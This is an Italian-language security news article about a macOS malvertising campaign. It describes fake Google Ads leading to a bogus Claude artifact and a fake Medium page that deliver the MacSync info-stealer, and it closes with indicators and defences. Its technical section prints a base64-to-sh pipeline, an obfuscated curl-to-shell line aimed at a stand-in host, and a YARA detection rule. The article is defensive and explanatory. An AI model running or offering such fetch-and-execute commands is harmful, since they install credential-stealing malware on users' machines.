Attacchi malware su macOS: Google Ads e piattaforme fidate sfruttate per colpire utenti

Attacchi malware su macOS: Google Ads e piattaforme fidate sfruttate per colpire utenti

Attenzione utenti macOS: non eseguire comandi Terminal da fonti online sconosciute!

Gli hacker stanno sfruttando annunci Google sponsorizzati e piattaforme fidate per diffondere malware pericoloso che ruba dati sensibili come credenziali, informazioni browser e wallet di criptovalute. Questa minaccia ha già raggiunto oltre 15.000 potenziali vittime. La soluzione rapida? Verifica sempre le fonti, usa antivirus affidabili e evita di copiare comandi dal Terminal da siti non ufficiali. In questo articolo, ti guideremo passo per passo su come riconoscere e bloccare questi attacchi.

Come funziona l’attacco

I cybercriminali usano tattiche di social engineering per ingannare gli utenti. Immagina di cercare soluzioni comuni su Google, come “risolutore DNS online” o “analizzatore spazio disco macOS CLI”. Invece di risultati legittimi, appaiono annunci sponsorizzati falsi che portano a pagine malevole mascherate da guide ufficiali.

  • Primo vettore: Un artefatto Claude AI fasullo intitolato “Esecuzione comandi sicura su macOS” invita a incollare un comando base64-encoded nel Terminal. Questo scarica uno script shell malizioso che installa il MacSync, un info-stealer.
  • Secondo vettore: Un articolo Medium fake su “apple-mac-disk-space.medium.com” finge di essere del team supporto Apple, usando la tecnica ClickFix con encoding doppio per eludere i rilevatori.

Questi trucchi sfruttano la fiducia in servizi come Google Ads, Claude AI e Medium, rendendo l’attacco subdolo e efficace.

Perché è pericoloso per te

Una volta eseguito, il malware:

  • Si connette a server di comando (come a2abotnet.com) con token hardcoded.
  • Spoofa User-Agent dei browser macOS per mimetizzare il traffico.
  • Ruba dati da keychain, browser e wallet crypto.
  • Comprimi i dati in /tmp/osalogging.zip e li invia via HTTP POST con meccanismi di retry avanzati (fino a 8 tentativi con backoff esponenziale).
  • Cancella le tracce per non essere rilevato.

Comandi malevoli usano trucchi come “cur””l” per aggirare filtri YARA e detection basica.

Soluzione immediata per utenti comuni:

  • Non cliccare annunci sponsorizzati per tool macOS.
  • Installa software solo dall’App Store ufficiale o siti verificati.
  • Usa estensioni browser anti-malvertising.
  • Esegui scansioni regolari con tool come quelli integrati in macOS o terze parti.

Questa campagna evidenzia un trend crescente: gli attori malevoli abusano di piattaforme legittime per distribuire minacce. Anche se gli annunci vengono rimossi, ne spuntano di nuovi.

Consigli per la protezione quotidiana

Per stare al sicuro:

  • Abilita Gatekeeper e verifica sempre le app.
  • Monitora connessioni di rete sospette.
  • Aggiorna macOS all’ultima versione.
  • Educa te stesso: se un sito chiede di eseguire comandi Terminal, chiudi e segnala.

Le organizzazioni dovrebbero deployare EDR (Endpoint Detection and Response) per monitorare attività Terminal e traffico verso domini noti.

Analisi tecnica approfondita

Questa sezione è per esperti IT, sviluppatori e amministratori di sistema che vogliono comprendere i dettagli tecnici della campagna e implementare difese avanzate.

Vettori di attacco dettagliati

Variante 1: Claude Artifact via Google Ads

  • Query trigger: “Online dns resolver”.
  • Landing: Artefatto pubblico Claude “macOS Secure Command Execution”.
  • Payload: Comando base64 che decodifica in shell script:
    # Esempio semplificato (non eseguire!)
echo 'malicious_base64' | base64 -d | sh
  • Il script scarica MacSync, che:
    • Usa token/API key per C2 su a2abotnet.com/dynamic.
    • Spoofing UA: Simula Safari/Chrome macOS.
    • Fetch AppleScript per theft: Target Keychain, Safari/Chrome data, ~/Library/Keychains, wallet in ~/Library/.
    • Exfil: ZIP in /tmp/osalogging.zip, chunked upload con retry (max 8, backoff 2^x).
    • Cleanup: rm -rf /tmp/*staging*.

Variante 2: Medium ClickFix

  • Query: “macos cli disk space analyzer”.
  • Sito: apple-mac-disk-space.medium.com (impersona Apple Support).
  • Tecnica: Double encoding + string obfuscation (es. “cur””l -s http://evil.com | sh”).
  • Infra diversa, ma stesso payload MacSync.

Indicatori di compromissione (IoC)

TipoIndicatoreDescrizione
Dominioa2abotnet.comServer C2
Dominioraxelpak.comHosting payload
Dominioapple-mac-disk-space.medium.comArticolo fake Apple
File/tmp/osalogging.zipZIP dati rubati
MalwareMacSyncInfo-stealer macOS

Mitigazioni tecniche

  • YARA Rules: Crea regole per pattern come base64 + curl + sh, obfuscation tricks.
    Esempio base:
    rule MacSync_Dropper {
    strings:
        $s1 = "cur""l"
        $s2 = "a2abotnet"
    condition:
        all of them
}
  • Endpoint Controls:
    • Blocca osascript non autorizzato.
    • Whitelisting app.
    • Monitora network:connect a domini sospetti.
  • Rilevamento comportamentale: Alert su exec da /tmp, upload chunked >1MB, UA spoofing.
  • Proattivo: Integra threat intel su malvertising Google Ads per macOS tool (Homebrew, CLI utils).

Trend e contesto

Queste campagne fanno parte di un ecosistema MaaS (Malware-as-a-Service) come AMOS/Atomic Stealer, distribuito via Google Ads, fake Homebrew, GitHub clones. Nel 2024-2025, +300% attacchi macOS, target crypto e credenziali. Gruppi come COOKIE SPIDER no-target Russia/CIS.

Per sysadmin: Deploy EDR con behavioral analytics. Testa con payload PoC in lab isolato.

Rimanendo vigili, possiamo ridurre il rischio. Condividi queste info per proteggere la community macOS.

Fonte: https://cybersecuritynews.com/threat-actors-exploit-claude-artifacts-and-google-ads/

Potrebbero interessarti

Inizia a scrivere e premi Invio per cercare

Torna in alto